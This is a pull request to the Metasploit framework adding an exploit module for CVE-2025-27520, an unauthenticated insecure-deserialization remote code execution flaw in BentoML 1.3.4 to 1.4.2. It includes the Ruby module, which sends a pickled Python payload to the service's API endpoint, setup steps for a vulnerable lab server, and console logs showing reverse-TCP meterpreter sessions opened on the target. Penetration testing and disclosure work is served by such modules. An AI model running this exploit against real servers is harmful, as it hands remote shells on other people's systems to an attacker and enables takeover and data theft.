### PR TITLE
Add BentoML RCE module (CVE-2025-27520)

### DIFF
--- a/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
+++ b/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+
+A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the v1.4.2 of BentoML.
+It allows any unauthenticated user to execute arbitrary code on the server.
+
+The vulnerability affects:
+
+    * 1.3.4 <= BentoML < 1.4.3
+
+This module was successfully tested on:
+
+    * BentoML 1.4.2 installed on Ubuntu 24.04
+
+
+### Installation
+
+1. `pip install -U bentoml`
+
+2. Define APIs in a service.py file:
+
+```python3
+from __future__ import annotations
+
+import bentoml
+
+
+@bentoml.service(
+        resources={"cpu": "2"}
+        )
+class Summarization:
+    @bentoml.api(batchable=True)
+    def summarize(self, texts: list[str]) -> list[str]:
+        return texts
+
+```
+
+3. `bentoml serve --host 0.0.0.0`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bentoml_rce_cve_2025_27520`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/bentoml_rce_cve_2025_27520
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > options
+
+Module options (exploit/linux/http/bentoml_rce_cve_2025_27520):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    3000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bas
+                                              h, python3.8+)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      aNHnUjyAfXo      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:32880) at 2025-04-15 22:29:18 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.16
+OS           : Ubuntu 24.04 (Linux 6.8.0-56-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
+++ b/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
@@ -19,19 +19,14 @@ This module was successfully tested on:
 2. Define APIs in a service.py file:
 
 ```python3
-from __future__ import annotations
-
 import bentoml
 
 
-@bentoml.service(
-        resources={"cpu": "2"}
-        )
+@bentoml.service(resources={"cpu": "2"})
 class Summarization:
     @bentoml.api(batchable=True)
-    def summarize(self, texts: list[str]) -> list[str]:
+    def summarize(self, texts):
         return texts
-
 ```
 
 3. `bentoml serve --host 0.0.0.0`

--- a/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
+++ b/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
@@ -14,7 +14,7 @@ This module was successfully tested on:
 
 ### Installation
 
-1. `pip install -U bentoml`
+1. `pip install -U bentoml==1.4.2`
 
 2. Define APIs in a service.py file:
 

--- a/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
+++ b/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
@@ -43,62 +43,81 @@ class Summarization:
 
 ## Options
 
+###  ENDPOINT (optional)
+Endpoint to use.
+
 
 ## Scenarios
+
+### Python payload
 ```
 msf6 > use exploit/linux/http/bentoml_rce_cve_2025_27520
-[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > options
 
 Module options (exploit/linux/http/bentoml_rce_cve_2025_27520):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT    3000             yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   ENDPOINT                   no        Endpoint to use
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     3000             yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                      no        HTTP server virtual host
 
 
-Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+Payload options (python/meterpreter/reverse_tcp):
 
-   Name            Current Setting  Required  Description
-   ----            ---------------  --------  -----------
-   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bas
-                                              h, python3.8+)
-   FETCH_SRVHOST                    no        Local IP to use for serving payload
-   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                    no        Local URI to use for serving payload
-   LHOST                            yes       The listen address (an interface may be specified)
-   LPORT           4444             yes       The listen port
-
-
-   When FETCH_FILELESS is false:
-
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_FILENAME      aNHnUjyAfXo      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
-   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Linux Command
+   0   Python payload
 
 
 
 View the full module info with the info, or info -d command.
 
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Python\ payload
+target => Python payload
 msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:32880) at 2025-04-15 22:29:18 +0900
+[*] Use /summarize as api endpoint.
+[*] Sending stage (24772 bytes) to 192.168.56.16
+[*] Expected error occurred.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:34930) at 2025-04-16 21:44:13 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer        : vul
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### Linux command
+```
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Linux\ Command
+target => Linux Command
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
+[*] Use /summarize as api endpoint.
+[*] Expected error occurred.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:35272) at 2025-04-16 21:45:17 +0900
 
 meterpreter > getuid
 Server username: ubu

--- a/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
+++ b/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2025-04-04',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'SideEffects' => [ IOC_IN_LOGS ],
           'Reliability' => [ REPEATABLE_SESSION, ]
         }
       )

--- a/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
+++ b/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BentoML RCE',
+        'Description' => %q{
+          A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in v1.4.2 of BentoML.
+          It allows any unauthenticated user to execute arbitrary code on the server.
+        },
+        'Author' => [
+          'c2an1',            # Vulnerability discovery and PoC
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-27520'],
+          ['URL', 'https://github.com/advisories/GHSA-33xw-247w-6hmc'],
+        ],
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                # defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '\'"'
+        },
+        'DisclosureDate' => '2025-04-04',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(3000),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'docs.json')
+    })
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    version = res.get_json_document&.dig('info', 'description')&.[](/BentoML-([\d.]+)-informational/, 1)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    version = Rex::Version.new(version)
+    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+
+    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('1.3.4'), Rex::Version.new('1.4.2'))
+
+    @api_endpoint = find_api_endpoint
+    return Exploit::CheckCode::Unknown('No vulnerable api endpoint.') unless @api_endpoint
+
+    Exploit::CheckCode::Appears("Version #{version} detected, which is vulnerable.")
+  end
+
+  def find_api_endpoint
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'docs.json')
+    })
+    return unless res&.code == 200
+
+    paths = res&.get_json_document&.dig('paths')
+    paths&.keys&.detect { |path| paths[path].keys.include?('post') }
+  end
+
+  def exploit
+    @api_endpoint ||= find_api_endpoint
+    fail_with(Failure::Unknown, 'No vulnerable api endpoint.') unless @api_endpoint
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, @api_endpoint),
+      'headers' => { 'Content-Type' => 'application/vnd.bentoml+pickle' },
+      'data' => Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, "import os;os.system('#{payload.encoded}')")
+    })
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+  end
+
+end

--- a/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
+++ b/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
@@ -62,6 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(3000),
+        OptString.new('ENDPOINT', [ false, 'Endpoint to use', ''])
       ]
     )
   end
@@ -99,8 +100,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @api_endpoint ||= find_api_endpoint
-    fail_with(Failure::Unknown, 'No vulnerable api endpoint.') unless @api_endpoint
+    @api_endpoint = datastore['ENDPOINT'].empty? ? find_api_endpoint : datastore['ENDPOINT']
+    fail_with(Failure::Unknown, 'No endpoint specified or no vulnerable api endpoint found.') unless @api_endpoint
+    print_status("Use #{@api_endpoint} as api endpoint.")
 
     if target['Type'] == :python
       data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)

--- a/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
+++ b/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @api_endpoint = datastore['ENDPOINT'].empty? ? find_api_endpoint : datastore['ENDPOINT']
+    @api_endpoint = datastore['ENDPOINT'].blank? ? find_api_endpoint : datastore['ENDPOINT']
     fail_with(Failure::Unknown, 'No endpoint specified or no vulnerable api endpoint found.') unless @api_endpoint
     print_status("Use #{@api_endpoint} as api endpoint.")
 

--- a/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
+++ b/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
@@ -27,8 +27,16 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-27520'],
           ['URL', 'https://github.com/advisories/GHSA-33xw-247w-6hmc'],
         ],
-        'Platform' => %w[linux],
         'Targets' => [
+          [
+            'Python payload',
+            {
+              'Arch' => ARCH_PYTHON,
+              'Platform' => 'python',
+              'Type' => :python,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ],
           [
             'Linux Command', {
               'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
@@ -43,9 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'FETCH_DELETE' => true
         },
         'DefaultTarget' => 0,
-        'Payload' => {
-          'BadChars' => '\'"'
-        },
         'DisclosureDate' => '2025-04-04',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
@@ -97,13 +102,20 @@ class MetasploitModule < Msf::Exploit::Remote
     @api_endpoint ||= find_api_endpoint
     fail_with(Failure::Unknown, 'No vulnerable api endpoint.') unless @api_endpoint
 
+    if target['Type'] == :python
+      data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)
+    else
+      data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, "import os;os.system(\"\"\"\n#{payload.encoded}\n\"\"\")")
+    end
+
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, @api_endpoint),
       'headers' => { 'Content-Type' => 'application/vnd.bentoml+pickle' },
-      'data' => Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, "import os;os.system('#{payload.encoded}')")
+      'data' => data
     })
     fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+    print_status('Expected error occurred.') if res.get_json_document&.dig('error') == '1 validation error for Input'
   end
 
 end


### PR DESCRIPTION
https://github.com/advisories/GHSA-33xw-247w-6hmc

## Vulnerable Application

A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the v1.4.2 of BentoML.
It allows any unauthenticated user to execute arbitrary code on the server.

The vulnerability affects:

    * 1.3.4 <= BentoML < 1.4.3

This module was successfully tested on:

    * BentoML 1.4.2 installed on Ubuntu 24.04


### Installation

1. `pip install -U bentoml==1.4.2`

2. Define APIs in a service.py file:

```python3
import bentoml


@bentoml.service(resources={"cpu": "2"})
class Summarization:
    @bentoml.api(batchable=True)
    def summarize(self, texts):
        return texts
```

3. `bentoml serve --host 0.0.0.0`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/bentoml_rce_cve_2025_27520`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Scenarios
```
msf6 > use exploit/linux/http/bentoml_rce_cve_2025_27520
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Python\ payload
target => Python payload
msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
[*] Use /summarize as api endpoint.
[*] Sending stage (24768 bytes) to 192.168.56.16
[*] Expected error occurred.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:37322) at 2025-04-16 22:08:30 +0900

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer        : vul
OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > 
```
